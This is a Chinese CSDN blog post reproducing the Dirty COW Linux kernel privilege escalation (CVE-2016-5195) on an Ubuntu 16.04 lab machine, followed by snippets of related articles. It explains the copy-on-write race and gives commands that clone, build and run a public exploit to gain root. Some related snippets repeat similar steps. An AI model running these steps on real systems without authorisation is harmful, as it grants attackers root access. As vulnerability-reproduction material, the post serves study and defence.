CVE漏洞复现-CVE-2016-5195 脏牛漏洞

最新推荐文章于 2024-07-25 09:58:57 发布
最新推荐文章于 2024-07-25 09:58:57 发布
阅读量707 收藏 2
点赞数 1
分类专栏: CVE漏洞复现 文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/132129685
版权

CVE-2016-5195 脏牛漏洞

漏洞描述

CVE-2016-5195 即 dirtyCOW ,俗称「脏牛」漏洞,是 Linux Kernel 中的条件竞争漏洞,攻击者可以利用 Linux kernel 中的 COW(Copy-on-Write)技术中存在的逻辑漏洞完成对文件的越权读写。存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。该漏洞具体为,Linux内核的内存子系统在处理写入复制(copy-on-write, COW)时产生了竞争条件(race condition)。恶意用户可利用此漏洞,来获取高权限,对只读内存映射进行写访问。竞争条件,指的是任务执行顺序异常,可导致应用崩溃,或令攻击者有机可乘,进一步执行其他代码。利用这一漏洞,攻击者可在其目标系统提升权限,甚至可能获得root权限

漏洞影响

这个漏洞自从内核2.6.22(2007年发行)开始就受影响了,直到 2016 年 10 月 18 日才修复

以下是Linux各发行版本对于该漏洞的相关信息

  • Red Hat:https://access.redhat.com/security/cve/cve-2016-5195
  • Debian :https://security-tracker.debian.org/tracker/CVE-2016-5195
  • Ubuntu:http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html

漏洞危害

低权限用户可以利用该漏洞可以在众多 Linux 系统上实现本地提权

环境安装

靶机下载:http://old-releases.ubuntu.com/releases/16.04.6/

在这里插入图片描述

接下来按照虚拟机安装即可

利用EXP下载:

https://github.com/gbonacini/CVE-2016-5195

漏洞复现

下载EXP,使用make进行编译

git clone https://github.com/gbonacini/CVE-2016-5195.git
cd CVE-2016-5195
make

在这里插入图片描述

执行以下的命令运行提权脚本

./dcow -s

在这里插入图片描述

可以看到,我们成功的从普通用户权限提升到了 root 用户权限

怰月
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
漏洞复现CVE-2016-5195 DirtyCow 脏牛提权
做自己喜欢的事,并将其发挥到极致!
03-10 7821
文章目录声明一、漏洞原理二、漏洞概述及成因三、漏洞影响范围四、先决条件五、漏洞危害六、本地复现方法一方法二:总结 声明 本文章仅限于漏洞复现和技术学习,切勿用于非法用途,出现任何后果与本人无关 一、漏洞原理 Linux内核的内存子系统在处理写入时复制(copy-on-write, COW)时产生了竞争条件(race condition)。恶意用户可利用此漏洞,来获取高权限,对只读内存映射进行写访问。(A race condition was found in the way the Linux kern
Linux脏牛提权漏洞复现CVE-2016-5195
小千安全
05-06 650
脏牛漏洞是一个严重的漏洞,可以允许攻击者获得管理员权限。为了保护系统的安全,请及时更新内核并采取其他安全措施。
安全合规之CVE-2016-2183
dzqxwzoe的博客
05-03 1736
安全部门脆弱性扫描到如下的风险漏洞要求系统上线必须要修复完毕。不过我仔细的看了安全部门返回的报告,它是针对Windows Server2019远程桌面端口进行风险报告…这是刷存在感了吗?哎,没有办法先做调查确认,然后再去考虑修复。此远程桌面是不对外发布的,但也需要针对此问题进行修复…才叫折磨人…
CVE漏洞复现-CVE-2019-5736 Docker逃逸
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-22 3378
Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的Linux或Windows操作系统的机器上,也可以实现虚拟化,容器是完全使用沙箱机制,相互之间不会有任何接口Docker环境和普通生产环境的差异在哪呢?举个列子,在普通的生产环境中,我们程序员写的代码产品在开发环境中能够运行起来,但却在测试环境中很容易出现各种的Bug,报错,这是因为两个环境中机器的配置和环境不一样所导致的而Docker的出现解决了这一差异性的问题。
DirtyCow脏牛漏洞复现(CVE-2016-5195)
tpaer的博客
11-16 2743
本文以vulnhub靶场中的lampiao为例复现脏牛提权漏洞
脏牛漏洞复现(CVE-2016-5195)
xiaolong22333的博客
09-10 683
脏牛漏洞可以让低权限的用户通过该漏洞完成本地提取 内核版本>=2.6.22 查看内核版本 uname -r 此时还是普通用户 exp地址 https://github.com/gbonacini/CVE-2016-5195.git 上传exp 编译 make 此时会生成可执行文件 执行就会返回root权限的shell ./dcow -s ...
CVE-2016-2183漏洞复现
网络战争的博客
09-06 2076
CVE-2016-2183是OpenSSL库中的一个漏洞,它影响了所有版本的OpenSSL 1.0.2之前,包括1.0.1和1.0.0版本。其中,`-cert`参数指定服务器证书,`-key`参数指定服务器密钥,`-accept`参数指定服务端口号,`-www`参数表示启用HTTP服务器。建议用户及时更新OpenSSL版本来修复该漏洞。其中,`-connect`参数指定要连接的主机和端口号,`-cipher`参数指定使用的密码套件。在此过程中,您需要设置一些证书相关的信息,如国家、地区、组织等。
CVE漏洞复现-CVE-2016-10033-远程命令执行
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-28 1656
PHPMailer是一个基于PHP语言的邮件发送组件,被广泛运用于诸如、Drupal、1CRM、SugarCRM、Yii、Joomla等用户量巨大的应用与框架中。CVE-2016-10033是PHPMailer中存在的高危漏洞,这个高危漏洞是由 class.phpmailer.php 没有正确处理用户的请致的攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害。:小于 5.2.18 版本。
漏洞复现-CVE-2022-24112 APISIX远程代码执行漏洞原理与复现
关注网络安全、云原生安全
07-15 1726
由于代码逻辑问题,没有覆盖为真实ip,导致绕过了请求限制,且发送请求有默认的key,通过发送请求注册路由,并使用batch-requests插件执行了命令。
DirtyCow提权漏洞复现CVE-2016-5195)1
08-08
脏牛(Dirty Cow)漏洞,全称为“竞争条件写入时复制”(Copy-on-Write Race Condition),在2016年被发现,其安全漏洞编号为CVE-2016-5195。这个漏洞主要影响的是Linux内核,特别是从2007年的2.6.22版本到修复前的...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8359
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1459
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
chromedriver-mac-arm64_126.0.6465.0.zip
07-31
chromedriver-mac-arm64_126.0.6465.0.zip
chromedriver-mac-x64_122.0.6235.0.zip
最新发布
07-31
chromedriver-mac-x64_122.0.6235.0.zip
Linux提权一脏牛漏洞(CVE-2016-5195)复现
07-28
你好!对于Linux提权的脏牛漏洞CVE-2016-5195),我可以为你提供一些复现的步骤。请注意,这是一个严重的安全漏洞,仅用于测试和教育目的。 在开始之前,请确保你已经备份了你的系统和数据,因为这个过程可能会对系统造成损坏。 以下是复现脏牛漏洞的一般步骤: 1. 确认你的系统受到脏牛漏洞的影响。你可以使用以下命令检查: ```shell $ uname -r ``` 如果输出的内核版本在`3.0`到`4.7`之间(不包括两端),那么你的系统可能受到影响。 2. 下载并编译脏牛漏洞的测试程序,可以使用以下命令: ```shell $ git clone https://github.com/dirtycow/dirtycow.github.io $ cd dirtycow.github.io $ make ``` 3. 运行测试程序进行提权。请注意,这可能会对系统造成损坏,所以请谨慎操作。 ```shell $ ./test_dirtycow your_file_name ``` `your_file_name`是你想要修改的目标文件的路径。这个测试程序会尝试修改目标文件的权限,以实现提权效果。 4. 检查提权是否成功。你可以尝试运行一个需要超级用户权限的命令来验证。 ```shell $ sudo whoami ``` 如果输出结果为"root",那么你已经成功提权了。 请记住,在测试和复现漏洞时,务必遵守法律和道德准则。此外,确保你在合法的环境下进行测试,并获得了合适的授权。 希望这些步骤能帮助到你!如果你有任何其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值